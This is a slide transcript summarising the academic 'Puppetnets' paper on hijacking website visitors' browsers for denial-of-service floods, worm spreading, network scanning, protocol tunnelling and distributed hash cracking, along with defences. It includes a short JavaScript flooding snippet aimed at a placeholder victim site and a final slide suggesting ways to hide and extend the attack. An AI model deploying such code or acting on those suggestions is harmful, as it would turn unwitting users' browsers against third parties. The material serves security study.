1 / 27

Puppetnets: Misusing Web Browsers as a Distributed Attack Infrastructure

Puppetnets: Misusing Web Browsers as a Distributed Attack Infrastructure. Paper By : V.T.Lam, S.Antonatos, P.Akritidis, K.G.Anagnostakis Conference : ACM Conference on Computer and Communications Security 2006 Presented By : Ramanarayanan Ramani. Attacker. 1.Compromise. Scenario.

rupali
Download Presentation

Puppetnets: Misusing Web Browsers as a Distributed Attack Infrastructure

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Puppetnets: Misusing Web Browsers as a DistributedAttack Infrastructure Paper By : V.T.Lam, S.Antonatos, P.Akritidis, K.G.Anagnostakis Conference : ACM Conference on Computer and Communications Security 2006 Presented By : Ramanarayanan Ramani

  2. Attacker 1.Compromise Scenario 3.Clients Access Webpage and execute malicious code 2.Embed Malicious Code in Webpage Clients are the Puppets – they can be controlled till they have the webpage open in the browser.

  3. Puppetnet vs Botnet • Not heavily dependent on the exploitation of specific implementation flaws • The attacker does not have complete control over the actions of the participating nodes • Participation in puppetnets is more dynamic

  4. Overview • Attack Scenarios using Puppetnet • Analysis of attack scenarios • Defense against Puppetnets • Paper Review • Suggestions

  5. DDoS (Distributed Denial of Service)

  6. DDoS • Sample Code : <script language=‘javascript’> setTimeout(pingVictim,1000); Function pingVictim() { var image1 = getElementById(‘img1’); image1.src = “www.victim.com/badurl.jpg”; setTimeout(pingVictim,1000); } </script> <body> <img id=‘img1’ /> </body>

  7. Worm Propagation

  8. Worm Propagation • Embed Worm Code in the Webpage • Perform scanning and try to propagate the worm code • If outbound from server blocked – it can propagate using webpage • Client behind NAT/Firewall can propagate in the secure network

  9. Reconnaissance probes

  10. Reconnaissance probes • Problem : Browsers refuse access to the contents of an inline frame, unless the source of the frame is in the same domain with the parent page • “Sandwich” the probe request between two requests to the malicious Web site Use onLoad,onError event handlers to sandwich request

  11. Protocols other than HTTP • Limitation of Puppetnets : Bound to use HTTP as part of browser Solution : • Tunnel SMTP/IRC/FTP.. • Protocol messages wrapped around the HTTP message GET /index.html HTTP/1.1 Host: www.example.com:25 HELO mydomain.com … (For SMTP)

  12. Exploiting cookie authenticatedservices Constraints : • The inline frame needs to be able to post cookies; this works on Firefox, but not IE • Have knowledge about the structure and content of the form to be posted, as well as the target URL • Able to instruct browsers to automatically post such forms (Supported by all browsers)

  13. Distributed malicious computations • Can be done through Javascript, Active-X or Java applets • ActiveX : Produces ‘Accept’ or ‘Deny’ box • Applets : Instantiate JVM – but can be placed in hidden frames • Script : Slower but can be hidden • Example : MD5 computation • Javascript : 380 checksums/sec • Applet : 434K checksums/sec • 1,000-node puppetnet can crack an MD5 hash as fast as a 128-node cluster

  14. Analysis - DDoS

  15. Analysis - DDoS

  16. Analysis - DDoS • Two types of attacks: • A simple attack aiming to maximize SYN packets (maxSYN) • One aiming to maximize the ingress bandwidth consumed (maxURL)

  17. Analysis - DDoS * Estimate for a 1000-node puppetnet

  18. Analysis – Worm PropagationCodeRed Worm • CodeRed attacks IIS server (Web Server) • A vulnerable population of 360,000 and a server scanning rate of 358 scans/min • Browsers performing 36 scans/min

  19. Analysis – Worm PropagationCodeRed Worm

  20. Analysis – Worm PropagationCodeRed Worm

  21. Analysis - Reconnaissance probes

  22. Analysis - Reconnaissance probes

  23. Defense • Disabling Javascript • Careful implementation of existing defenses • Filtering using attack signatures • Client-side behavioral controls • Server-side controls and puppetnet tracing • Server-directed client-side controls

  24. Advantages • Simple and very effective to attack • Light-weight compared to botnet • Uses HTTP which makes detection difficult

  25. Disadvantages • No complete control over client • Tough to compromise web servers (not explained how to do it in the paper) • View Source Command on HTML page will reveal puppetnet code

  26. Suggestions • Look into hiding code using encoding or embed code into objects like Flash • Use puppetnet to create botnet in the client machine • Provide ideas to compromise the web server

  27. ?Questions?

More Related